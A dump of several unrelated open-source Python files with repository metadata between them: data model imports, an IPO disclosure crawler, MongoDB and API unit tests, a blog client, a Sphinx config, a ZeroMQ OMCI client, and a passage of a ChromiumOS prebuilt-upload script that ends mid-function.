from sportsdata.nba_odds.models.nba_odds_game_info import NbaOddsGameInfo
from sportsdata.nba_odds.models.nba_odds_game_odd import NbaOddsGameOdd
from sportsdata.nba_odds.models.nba_odds_matchup_trends import NbaOddsMatchupTrends
from sportsdata.nba_odds.models.nba_odds_player_prop import NbaOddsPlayerProp
from sportsdata.nba_odds.models.nba_odds_quarter import NbaOddsQuarter
from sportsdata.nba_odds.models.nba_odds_sportsbook import NbaOddsSportsbook
from sportsdata.nba_odds.models.nba_odds_team_game_trends import NbaOddsTeamGameTrends
from sportsdata.nba_odds.models.nba_odds_team_trends import NbaOddsTeamTrends
|
[
"[email protected]"
] | |
ec00fa8dbeafca6163d5777781721771db5178fe
|
0a973640f0b02d7f3cf9211fcce33221c3a50c88
|
/.history/src/sz_IPO_crawler_20210125145435.py
|
2568a261c5c7c16de47a6b2efa3fab2001615b19
|
[] |
no_license
|
JiajunChen123/IPO_under_review_crawler
|
5468b9079950fdd11c5e3ce45af2c75ccb30323c
|
031aac915ebe350ec816c05a29b5827fde588567
|
refs/heads/main
| 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,992 |
py
|
import requests
import re
import json
import pickle
import os
import random
import time
from urllib.parse import urlencode
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',}
# 'Accept': '*/*',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh-CN,zh;q=0.9',
# 'Connection': 'keep-alive',
# 'Host': 'listing.szse.cn'}
def index_getter(projtype):
if projtype == 'ipo':
biztype = 1
elif projtype == 'refinance':
biztype = 2
elif projtype == 'reproperty':
biztype = 3
else:
print("Input error! Please choose the correct type of data")
return
params = {'bizType':biztype, 'random':random.random(),'pageIndex':0,'pageSize':1000}
base_url = 'http://listing.szse.cn/api/ras/projectrends/query?'
projList_url = base_url + urlencode(params)
r = requests.get(projList_url,headers=headers)
index_list = json.loads(r.text)
save_obj(index_list['data'], os.getcwd()+'/'+'sz_index'+'_'+projtype+'.pkl')
return index_list['data']
def data_getter(prjid):
base_url = 'http://listing.szse.cn/api/ras/projectrends/details?id='
stock_url = base_url + prjid
r = requests.get(stock_url,headers=headers)
stockInfo = json.loads(r.text)['data']
base_path = os.getcwd() + '/data/'
directory = base_path + '/' + stockInfo['biztyp'] + '/' + stockInfo['cmpnm']
if not os.path.exists(directory):
os.makedirs(directory)
save_obj(stockInfo,directory+'/'+'sz_info.pkl')
return stockInfo
def file_getter(stockInfo):
base_path = os.getcwd()
directory = base_path + '/' + +stockInfo['cmpnm']
if not os.path.exists(directory):
os.makedirs(directory)
response = stockInfo['enquiryResponseAttachment']
disclosure = stockInfo['disclosureMaterials']
base_url = 'http://reportdocs.static.szse.cn'
for prj in disclosure:
filePath = prj['dfpth']
filename = directory + '\\'+ prj['dfnm']
download_url = base_url + filePath
time.sleep(random.randint(1, 3))
r = requests.get(download_url,headers=headers)
with open(filename,'wb') as f:
f.write(r.content)
def save_obj(obj, directory):
with open(directory + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(directory ):
with open( directory + '.pkl', 'rb') as f:
return pickle.load(f)
if __name__ == '__main__':
proj_list = index_getter()
# print('there are total {} stocks in the list'.format(len(proj_list)))
# i=0
# for proj in proj_list:
# i+=1
# print('fetching number project {},{}'.format(i,proj['cmpsnm']))
# prjid = proj['prjid']
# stockInfo = data_getter(str(prjid))
# # file_getter(stockInfo)
# time.sleep(random.randint(2,5))
# print('Update completed!!!!')
|
[
"[email protected]"
] | |
fdc9fd8f92918ca6771e9e0ad94abfe344f6114c
|
23d962a8e36b4a58e63e15f3c61a88b537a80f6e
|
/test/unit/mongo_class/server_is_locked.py
|
d7861bb5324cd04455a669a9b1e26c6234b271a3
|
[
"MIT"
] |
permissive
|
deepcoder42/mongo-lib
|
3a893d38edb3e03decff0cfbcbf29339026909f9
|
fa2b65587ab88ee90c9d85f12dd642c6295e0d94
|
refs/heads/master
| 2023-06-14T10:10:12.032877 | 2021-07-13T15:22:17 | 2021-07-13T15:22:17 | 337,179,035 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,875 |
py
|
#!/usr/bin/python
# Classification (U)
"""Program: server_is_locked.py
Description: Unit testing of Server.is_locked in mongo_class.py.
Usage:
test/unit/mongo_class/server_is_locked.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
# Local
sys.path.append(os.getcwd())
import mongo_class
import version
__version__ = version.__version__
class Conn(object):
"""Class: Conn
Description: Class stub holder for Rep class.
Methods:
__init__
"""
def __init__(self):
"""Function: __init__
Description: Stub holder for Rep.conn.is_locked attribute.
Arguments:
"""
self.is_locked = True
class UnitTest(unittest.TestCase):
"""Class: UnitTest
Description: Class which is a representation of a unit testing.
Methods:
setUp
test_is_locked
"""
def setUp(self):
"""Function: setUp
Description: Initialization for unit testing.
Arguments:
"""
self.name = "Mongo_Server"
self.user = "mongo_user"
self.japd = "mongo_pd"
self.host = "host_server"
self.port = 27017
self.dbs = "test"
self.coll = None
self.db_auth = None
self.repset = "mongo_repset"
self.nodes = ["node1", "node2"]
def test_is_locked(self):
"""Function: test_is_locked
Description: Test is_locked method.
Arguments:
"""
mongo = mongo_class.Rep(self.name, self.user, self.japd, self.host,
self.port)
mongo.conn = Conn()
self.assertEqual(mongo.is_locked(), True)
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
667e8cbd9f81dcd1adcb4e66abeaed066ae757ba
|
fa6204d88a35af62357cfd5091217cbc2087b779
|
/blogclient/api/client.py
|
223c1abb037c9629adcc026bad8833da7d542f4a
|
[] |
no_license
|
StephenTao/python-blogclient
|
9acaa25e2a4e2bc1a29b02791d6338ee41a91c5b
|
6543668f8db6f83751be42464cb4065472972388
|
refs/heads/master
| 2021-01-10T15:46:34.529878 | 2016-02-25T07:30:16 | 2016-02-25T07:30:16 | 52,505,499 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,681 |
py
|
# Copyright 2013 - Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
from blogclient.api.v1 import client as client_v1
def client(blog_url=None, username=None, api_key=None,
project_name=None, auth_url=None, project_id=None,
endpoint_type='publicURL', service_type='workflow',
auth_token=None, user_id=None, cacert=None):
if blog_url and not isinstance(blog_url, six.string_types):
raise RuntimeError('Blog url should be a string.')
if not blog_url:
blog_url = "http://localhost:8989/v1"
return client_v1.Client(
blog_url=blog_url,
username=username,
api_key=api_key,
project_name=project_name,
auth_url=auth_url,
project_id=project_id,
endpoint_type=endpoint_type,
service_type=service_type,
auth_token=auth_token,
user_id=user_id,
cacert=cacert
)
def determine_client_version(blog_url):
if blog_url.find("v1") != -1:
return 1
raise RuntimeError("Can not determine blog API version")
|
[
"[email protected]"
] | |
8b5451e8e262b8fb4e784eb42c74bd0c64603b5a
|
6160586aa239eada16e735d40d57970dedbe1dfc
|
/case/user_manage/user_info/test_user_query_info_byauthcode.py
|
149975f8bde64ddd7f75f83bf84f12cfe3838b33
|
[] |
no_license
|
showgea/AIOT
|
7f9ffcd49da54836714b3342232cdba330d11e6c
|
fe8275aba1c4b5402c7c2c2987509c0ecf49f330
|
refs/heads/master
| 2020-07-23T10:19:37.478456 | 2019-09-23T12:25:59 | 2019-09-23T12:25:59 | 207,525,184 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,773 |
py
|
import unittest
import json
from modules.user_manage.user_info.user_query_info_byauthcode import *
from common.get_result_db import get_common_code
account_mail_Gary = readcfg.account_mail_Gary
account_wrong = readcfg.account_wrong
userId = readcfg.userId_Gary
authCode = readcfg.authCode_wrong
class TestUserQueryInfoByAuthCode(unittest.TestCase):
"""
根据验证码及账号获取用户基本信息
"""
@classmethod
def setUpClass(cls):
cls.authCode_email = get_common_code()
def test_user_query_info_byauthcode_01(self):
"""测试根据验证码及账号获取用户基本信息"""
result = user_query_info_byauthcode(account_mail_Gary, self.authCode_email)
# print(self.authCode_phone)
userId_api = json.loads(result.text)["result"]["userId"]
self.assertEqual(userId, userId_api, "查询接口返回userId:%s" % userId_api)
def test_user_query_info_byauthcode_02(self):
"""测试账号错误或不存在"""
result = user_query_info_byauthcode(account_wrong, authCode)
self.assertIn('"code":811', result.text)
def test_user_query_info_byauthcode_03(self):
"""测试账号为空"""
result = user_query_info_byauthcode("", authCode)
self.assertIn('"code":302', result.text)
def test_user_query_info_byauthcode_04(self):
"""测试验证码为空"""
result = user_query_info_byauthcode(account_mail_Gary, "")
self.assertIn('"code":302', result.text)
def test_user_query_info_byauthcode_05(self):
"""测试验证码错误"""
result = user_query_info_byauthcode(account_mail_Gary, authCode)
self.assertIn('"code":811', result.text)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
83f84c608ac3defec12fffbaa9198a2a4ef806f6
|
d6fd55ff015ddcc380ffea2da140d86c5fa9feff
|
/docs/sphinx/conf.py
|
fe8f81d927201b667b2037926f26cfecb8d0066f
|
[
"BSD-3-Clause"
] |
permissive
|
sdss/astra_thecannon
|
b3a461b91894ec391318fd4a098b5688299923b8
|
3062025aa2ac3b8af257490be63201587b23762d
|
refs/heads/master
| 2021-07-05T01:08:12.774277 | 2020-10-06T12:37:53 | 2020-10-06T12:37:53 | 182,139,411 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,697 |
py
|
# -*- coding: utf-8 -*-
#
# BMO documentation build configuration file, created by
# sphinx-quickstart on Fri May 5 01:30:21 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sphinx_bootstrap_theme
# Importing matplotlib here with agg to prevent tkinter error in readthedocs
# import matplotlib
# matplotlib.use('agg')
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
from thecannon import __version__
from pkg_resources import parse_version
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.napoleon', 'sphinx.ext.autosummary',
'sphinx.ext.todo', 'sphinx.ext.viewcode', 'sphinx.ext.mathjax',
'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = ['.rst', '.md']
# source_suffix = '.rst'
source_parsers = {
'.md': 'recommonmark.parser.CommonMarkParser',
}
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'thecannon'
copyright = '{0}, {1}'.format('2019', 'Andy Casey')
author = 'Andy Casey'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# The short X.Y version.
version = parse_version(__version__).base_version
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = 'py:obj'
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# Intersphinx mappings
intersphinx_mapping = {'python': ('https://docs.python.org/3.6', None),
'astropy': ('http://docs.astropy.org/en/latest', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None)}
autodoc_mock_imports = ['_tkinter']
autodoc_member_order = 'groupwise'
napoleon_use_rtype = False
napoleon_use_ivar = True
rst_epilog = """
.. |numpy_array| replace:: Numpy array
.. |HDUList| replace:: :class:`~astropy.io.fits.HDUList`
"""
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'bootstrap'
html_sidebars = {}
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
# Navigation bar title. (Default: ``project`` value)
'navbar_title': "SDSS: {0}".format(project),
# Tab name for entire site. (Default: "Site")
'navbar_site_name': "Site",
# A list of tuples containing pages or urls to link to.
# Valid tuples should be in the following forms:
# (name, page) # a link to a page
# (name, "/aa/bb", 1) # a link to an arbitrary relative url
# (name, "http://example.com", True) # arbitrary absolute url
# Note the "1" or "True" value above as the third argument to indicate
# an arbitrary url.
'navbar_links': [
],
# Render the next and previous page links in navbar. (Default: true)
'navbar_sidebarrel': False,
# Render the current pages TOC in the navbar. (Default: true)
'navbar_pagenav': False,
# Tab name for the current pages TOC. (Default: "Page")
'navbar_pagenav_name': "Page",
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 2,
# Include hidden TOCs in Site navbar?
#
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
#
# Values: "true" (default) or "false"
'globaltoc_includehidden': "true",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For black navbar, do "navbar navbar-inverse"
'navbar_class': "navbar",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "true",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "",
# Bootswatch (http://bootswatch.com/) theme.
#
# Options are nothing (default) or the name of a valid theme
# such as "amelia" or "cosmo".
'bootswatch_theme': "paper",
# Choose Bootstrap version.
# Values: "3" (default) or "2" (in quotes)
'bootstrap_version': "3",
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
html_favicon = './_static/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_sidebars = {'**': ['localtoc.html']}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = '{0}pdoc'.format('thecannon')
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, '{0}.tex'.format(project), u'{0} Documentation'.format(project),
author, 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'thecannon', u'{0} Documentation'.format(project),
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, project, u'{0} Documentation'.format(project),
author, project, 'One line description of project.',
'Miscellaneous'),
]
|
[
"[email protected]"
] | |
64f07b85e6b523f464618b624f7e189b7ea0b60c
|
a94b729855ba7239830952f0814cf19850ad123c
|
/voltha/adapters/adtran_olt/net/adtran_zmq.py
|
9cbeae68c0f58b7ec726d9e9e3be522031eb87d9
|
[
"Apache-2.0"
] |
permissive
|
kthomas8/voltha
|
37b1e69c1736ad780bf6233fd5272cfaab5bbfb9
|
b5d1c18994de5c342ac97429c733b0b597df5690
|
refs/heads/master
| 2021-01-01T19:40:53.623682 | 2017-07-13T08:50:19 | 2017-07-27T17:42:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,310 |
py
|
#
# Copyright 2017-present Adtran, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import binascii
import struct
import structlog
from txzmq import ZmqEndpoint, ZmqFactory
from txzmq.connection import ZmqConnection
from zmq import constants
log = structlog.get_logger()
zmq_factory = ZmqFactory()
# An OMCI message minimally has a 32-bit PON index and 32-bit ONU ID.
_OLT_TASK_ZEROMQ_OMCI_TCP_PORT = 25656
class AdtranZmqClient(object):
"""
Adtran ZeroMQ Client for PON Agent packet in/out service
PON Agent expects and external PAIR socket with
"""
def __init__(self, ip_address, rx_callback=None,
port=_OLT_TASK_ZEROMQ_OMCI_TCP_PORT):
self.external_conn = 'tcp://{}:{}'.format(ip_address, port)
self.zmq_endpoint = ZmqEndpoint('connect', self.external_conn)
self.socket = ZmqPairConnection(zmq_factory,
self.zmq_endpoint)
self.socket.onReceive = rx_callback or AdtranZmqClient.rx_nop
def send(self, data):
try:
self.socket.send(data)
except Exception as e:
log.exception(e.message)
def shutdown(self):
self.socket.onReceive = AdtranZmqClient.rx_nop
self.socket.shutdown()
@staticmethod
def rx_nop(message):
log.debug('Discarding ZMQ message, no receiver specified')
@staticmethod
def encode_omci_message(msg, pon_index, onu_id):
"""
Create an OMCI Tx Packet for the specified ONU
:param msg: (str) OMCI message to send
:param pon_index: (unsigned int) PON Port index
:param onu_id: (unsigned int) ONU ID
:return: (bytes) octet string to send
"""
assert msg
# log.debug("Encoding OMCI: PON: {}, ONU: {}, Message: '{}'".
# format(pon_index, onu_id, msg))
s = struct.Struct('!II')
return s.pack(pon_index, onu_id) + binascii.unhexlify(msg)
@staticmethod
def decode_packet(packet):
"""
Decode the packet provided by the ZMQ client
:param packet: (bytes) Packet
:return: (long, long, bytes, boolean) PON Index, ONU ID, Frame Contents (OMCI or Ethernet),\
and a flag indicating if it is OMCI
"""
# TODO: For now, only OMCI supported
if isinstance(packet, list):
if len(packet) > 1:
pass # TODO: Can we get multiple packets?
return AdtranZmqClient._decode_omci_message(packet[0])
return -1, -1, None, False
@staticmethod
def _decode_omci_message(packet):
"""
Decode the packet provided by the ZMQ client
:param packet: (bytes) Packet
:return: (long, long, bytes) PON Index, ONU ID, OMCI Frame Contents
"""
(pon_index, onu_id) = struct.unpack_from('!II', packet)
omci_msg = packet[8:]
return pon_index, onu_id, omci_msg, True
@staticmethod
def _decode_packet_in_message(packet):
# TODO: This is not yet supported
(pon_index, onu_id) = struct.unpack_from('!II', packet)
msg = binascii.hexlify(packet[8:])
return pon_index, onu_id, msg, False
class ZmqPairConnection(ZmqConnection):
"""
Bidirectional messages to/from the socket.
Wrapper around ZeroMQ PUSH socket.
"""
socketType = constants.PAIR
def messageReceived(self, message):
"""
Called on incoming message from ZeroMQ.
:param message: message data
"""
self.onReceive(message)
def onReceive(self, message):
"""
Called on incoming message received from other end of the pair.
:param message: message data
"""
raise NotImplementedError(self)
|
[
"[email protected]"
] | |
ada1cec3b5d822959961a9d785d03656d5922b52
|
3b9b4049a8e7d38b49e07bb752780b2f1d792851
|
/src/third_party/chromite/scripts/upload_prebuilts.py
|
ccb1dcc19fe595e9c887a273d4b32bae8105a67b
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT"
] |
permissive
|
webosce/chromium53
|
f8e745e91363586aee9620c609aacf15b3261540
|
9171447efcf0bb393d41d1dc877c7c13c46d8e38
|
refs/heads/webosce
| 2020-03-26T23:08:14.416858 | 2018-08-23T08:35:17 | 2018-09-20T14:25:18 | 145,513,343 | 0 | 2 |
Apache-2.0
| 2019-08-21T22:44:55 | 2018-08-21T05:52:31 | null |
UTF-8
|
Python
| false | false | 36,787 |
py
|
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This script is used to upload host prebuilts as well as board BINHOSTS.
Prebuilts are uploaded using gsutil to Google Storage. After these prebuilts
are successfully uploaded, a file is updated with the proper BINHOST version.
To read more about prebuilts/binhost binary packages please refer to:
http://goto/chromeos-prebuilts
Example of uploading prebuilt amd64 host files to Google Storage:
upload_prebuilts -p /b/cbuild/build -s -u gs://chromeos-prebuilt
Example of uploading x86-dogfood binhosts to Google Storage:
upload_prebuilts -b x86-dogfood -p /b/cbuild/build/ -u gs://chromeos-prebuilt -g
"""
from __future__ import print_function
import argparse
import datetime
import functools
import glob
import multiprocessing
import os
import sys
import tempfile
from chromite.cbuildbot import constants
from chromite.cbuildbot import commands
from chromite.lib import binpkg
from chromite.lib import commandline
from chromite.lib import cros_build_lib
from chromite.lib import cros_logging as logging
from chromite.lib import git
from chromite.lib import gs
from chromite.lib import osutils
from chromite.lib import parallel
from chromite.lib import portage_util
from chromite.lib import toolchain
# How many times to retry uploads.
_RETRIES = 10
# Multiplier for how long to sleep (in seconds) between retries; will delay
# (1*sleep) the first time, then (2*sleep), continuing via attempt * sleep.
_SLEEP_TIME = 60
# The length of time (in seconds) that Portage should wait before refetching
# binpkgs from the same binhost. We don't ever modify binhosts, so this should
# be something big.
_BINPKG_TTL = 60 * 60 * 24 * 365
_HOST_PACKAGES_PATH = 'chroot/var/lib/portage/pkgs'
_CATEGORIES_PATH = 'chroot/etc/portage/categories'
_PYM_PATH = 'chroot/usr/lib/portage/pym'
_HOST_ARCH = 'amd64'
_BOARD_PATH = 'chroot/build/%(board)s'
_REL_BOARD_PATH = 'board/%(target)s/%(version)s'
_REL_HOST_PATH = 'host/%(host_arch)s/%(target)s/%(version)s'
# Private overlays to look at for builds to filter
# relative to build path
_PRIVATE_OVERLAY_DIR = 'src/private-overlays'
_GOOGLESTORAGE_GSUTIL_FILE = 'googlestorage_acl.txt'
_BINHOST_BASE_URL = 'gs://chromeos-prebuilt'
_PREBUILT_BASE_DIR = 'src/third_party/chromiumos-overlay/chromeos/config/'
# Created in the event of new host targets becoming available
_PREBUILT_MAKE_CONF = {'amd64': os.path.join(_PREBUILT_BASE_DIR,
'make.conf.amd64-host')}
class BuildTarget(object):
"""A board/variant/profile tuple."""
def __init__(self, board_variant, profile=None):
self.board_variant = board_variant
self.board, _, self.variant = board_variant.partition('_')
self.profile = profile
def __str__(self):
if self.profile:
return '%s_%s' % (self.board_variant, self.profile)
else:
return self.board_variant
def __eq__(self, other):
return str(other) == str(self)
def __hash__(self):
return hash(str(self))
def UpdateLocalFile(filename, value, key='PORTAGE_BINHOST'):
"""Update the key in file with the value passed.
File format:
key="value"
Note quotes are added automatically
Args:
filename: Name of file to modify.
value: Value to write with the key.
key: The variable key to update. (Default: PORTAGE_BINHOST)
Returns:
True if changes were made to the file.
"""
if os.path.exists(filename):
file_fh = open(filename)
else:
file_fh = open(filename, 'w+')
file_lines = []
found = False
made_changes = False
keyval_str = '%(key)s=%(value)s'
for line in file_fh:
# Strip newlines from end of line. We already add newlines below.
line = line.rstrip("\n")
if len(line.split('=')) != 2:
# Skip any line that doesn't fit key=val.
file_lines.append(line)
continue
file_var, file_val = line.split('=')
if file_var == key:
found = True
print('Updating %s=%s to %s="%s"' % (file_var, file_val, key, value))
value = '"%s"' % value
made_changes |= (file_val != value)
file_lines.append(keyval_str % {'key': key, 'value': value})
else:
file_lines.append(keyval_str % {'key': file_var, 'value': file_val})
if not found:
value = '"%s"' % value
made_changes = True
file_lines.append(keyval_str % {'key': key, 'value': value})
file_fh.close()
# write out new file
osutils.WriteFile(filename, '\n'.join(file_lines) + '\n')
return made_changes
def RevGitFile(filename, data, retries=5, dryrun=False):
"""Update and push the git file.
Args:
filename: file to modify that is in a git repo already
data: A dict of key/values to update in |filename|
retries: The number of times to retry before giving up, default: 5
dryrun: If True, do not actually commit the change.
"""
prebuilt_branch = 'prebuilt_branch'
cwd = os.path.abspath(os.path.dirname(filename))
commit = git.RunGit(cwd, ['rev-parse', 'HEAD']).output.rstrip()
description = '%s: updating %s' % (os.path.basename(filename),
', '.join(data.keys()))
# UpdateLocalFile will print out the keys/values for us.
print('Revving git file %s' % filename)
try:
git.CreatePushBranch(prebuilt_branch, cwd)
for key, value in data.iteritems():
UpdateLocalFile(filename, value, key)
git.RunGit(cwd, ['add', filename])
git.RunGit(cwd, ['commit', '-m', description])
git.PushWithRetry(prebuilt_branch, cwd, dryrun=dryrun, retries=retries)
finally:
git.RunGit(cwd, ['checkout', commit])
def GetVersion():
"""Get the version to put in LATEST and update the git version with."""
return datetime.datetime.now().strftime('%Y.%m.%d.%H%M%S')
def _GsUpload(gs_context, acl, local_file, remote_file):
"""Upload to GS bucket.
Args:
gs_context: A lib.gs.GSContext instance.
acl: The ACL to use for uploading the file.
local_file: The local file to be uploaded.
remote_file: The remote location to upload to.
"""
CANNED_ACLS = ['public-read', 'private', 'bucket-owner-read',
'authenticated-read', 'bucket-owner-full-control',
'public-read-write']
if acl in CANNED_ACLS:
gs_context.Copy(local_file, remote_file, acl=acl)
else:
# For private uploads we assume that the overlay board is set up properly
# and a googlestore_acl.xml is present. Otherwise, this script errors.
# We set version=0 here to ensure that the ACL is set only once (see
# http://b/15883752#comment54).
try:
gs_context.Copy(local_file, remote_file, version=0)
except gs.GSContextPreconditionFailed as ex:
# If we received a GSContextPreconditionFailed error, we know that the
# file exists now, but we don't know whether our specific update
# succeeded. See http://b/15883752#comment62
logging.warning(
'Assuming upload succeeded despite PreconditionFailed errors: %s', ex)
if acl.endswith('.xml'):
# Apply the passed in ACL xml file to the uploaded object.
gs_context.SetACL(remote_file, acl=acl)
else:
gs_context.ChangeACL(remote_file, acl_args_file=acl)
def RemoteUpload(gs_context, acl, files, pool=10):
"""Upload to google storage.
Create a pool of process and call _GsUpload with the proper arguments.
Args:
gs_context: A lib.gs.GSContext instance.
acl: The canned acl used for uploading. acl can be one of: "public-read",
"public-read-write", "authenticated-read", "bucket-owner-read",
"bucket-owner-full-control", or "private".
files: dictionary with keys to local files and values to remote path.
pool: integer of maximum proesses to have at the same time.
Returns:
Return a set of tuple arguments of the failed uploads
"""
upload = functools.partial(_GsUpload, gs_context, acl)
tasks = [[key, value] for key, value in files.iteritems()]
parallel.RunTasksInProcessPool(upload, tasks, pool)
def GenerateUploadDict(base_local_path, base_remote_path, pkgs):
"""Build a dictionary of local remote file key pairs to upload.
Args:
base_local_path: The base path to the files on the local hard drive.
base_remote_path: The base path to the remote paths.
pkgs: The packages to upload.
Returns:
Returns a dictionary of local_path/remote_path pairs
"""
upload_files = {}
for pkg in pkgs:
suffix = pkg['CPV'] + '.tbz2'
local_path = os.path.join(base_local_path, suffix)
assert os.path.exists(local_path), '%s does not exist' % local_path
upload_files[local_path] = os.path.join(base_remote_path, suffix)
if pkg.get('DEBUG_SYMBOLS') == 'yes':
debugsuffix = pkg['CPV'] + '.debug.tbz2'
local_path = os.path.join(base_local_path, debugsuffix)
assert os.path.exists(local_path)
upload_files[local_path] = os.path.join(base_remote_path, debugsuffix)
return upload_files
def GetBoardOverlay(build_path, target):
"""Get the path to the board variant.
Args:
build_path: The path to the root of the build directory
target: The target board as a BuildTarget object.
Returns:
The last overlay configured for the given board as a string.
"""
board = target.board_variant
overlays = portage_util.FindOverlays(constants.BOTH_OVERLAYS, board,
buildroot=build_path)
# We only care about the last entry.
return overlays[-1]
def DeterminePrebuiltConfFile(build_path, target):
"""Determine the prebuilt.conf file that needs to be updated for prebuilts.
Args:
build_path: The path to the root of the build directory
target: String representation of the board. This includes host and board
targets
Returns:
A string path to a prebuilt.conf file to be updated.
"""
if _HOST_ARCH == target:
# We are host.
# Without more examples of hosts this is a kludge for now.
# TODO(Scottz): as new host targets come online expand this to
# work more like boards.
make_path = _PREBUILT_MAKE_CONF[target]
else:
# We are a board
board = GetBoardOverlay(build_path, target)
make_path = os.path.join(board, 'prebuilt.conf')
return make_path
def UpdateBinhostConfFile(path, key, value):
"""Update binhost config file file with key=value.
Args:
path: Filename to update.
key: Key to update.
value: New value for key.
"""
cwd, filename = os.path.split(os.path.abspath(path))
osutils.SafeMakedirs(cwd)
if not git.GetCurrentBranch(cwd):
git.CreatePushBranch(constants.STABLE_EBUILD_BRANCH, cwd, sync=False)
osutils.WriteFile(path, '', mode='a')
if UpdateLocalFile(path, value, key):
desc = '%s: %s %s' % (filename, 'updating' if value else 'clearing', key)
git.AddPath(path)
git.Commit(cwd, desc)
def GenerateHtmlIndex(files, index, board, version):
